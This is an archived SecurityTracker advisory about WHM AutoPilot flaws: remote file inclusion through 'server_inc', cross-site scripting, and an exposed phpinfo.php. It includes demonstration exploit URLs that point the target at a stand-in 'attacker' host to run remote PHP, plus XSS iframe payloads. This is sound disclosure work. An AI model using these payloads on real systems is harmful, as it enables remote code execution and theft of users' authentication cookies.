SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   WHM AutoPilot Vendors:   Benchmark Designs
WHM AutoPilot 'server_inc' Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012707
SecurityTracker URL:  http://securitytracker.com/id/1012707
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 28 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in WHM AutoPilot. A remote user can execute arbitrary commands on the target system. A remote user can conduct cross-site scripting attacks. A remote user can obtain information about the target system.

James Bercegay of the GulfTech Security Research Team reported that several scripts do not properly validate user-supplied input. A remote user can load several scripts and supply a specially crafted 'server_inc' value to cause the script to include and execute arbitrary PHP code. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/path/inc/header.php/step_one.php?server_inc=http://attacker/step_one_tables.php
http://[target]/path/inc/step_one_tables.php?server_inc=http://attacker/js_functions.php
http://[target]/path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

Several scripts can be called directly with specially crafted values to trigger cross-site scripting attacks. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the WHM AutoPilot software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/path/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://[target]/path/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E

Other files in the '/themes/blue/' directory may also be affected.

It is also reported that the software installs a 'phpinfo.php' script by default, allowing a remote user to obtain information about the target system.

The original advisory is available at:

http://www.gulftech.org/?node=research&article_id=00059-12272004

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the WHM AutoPilot software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can obtain information about the PHP environment on the target system.

Solution:   The vendor has issued a fixed version.
Vendor URL:  www.whmautopilot.com/index.php (Links to External Site)
Cause:   Access control error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC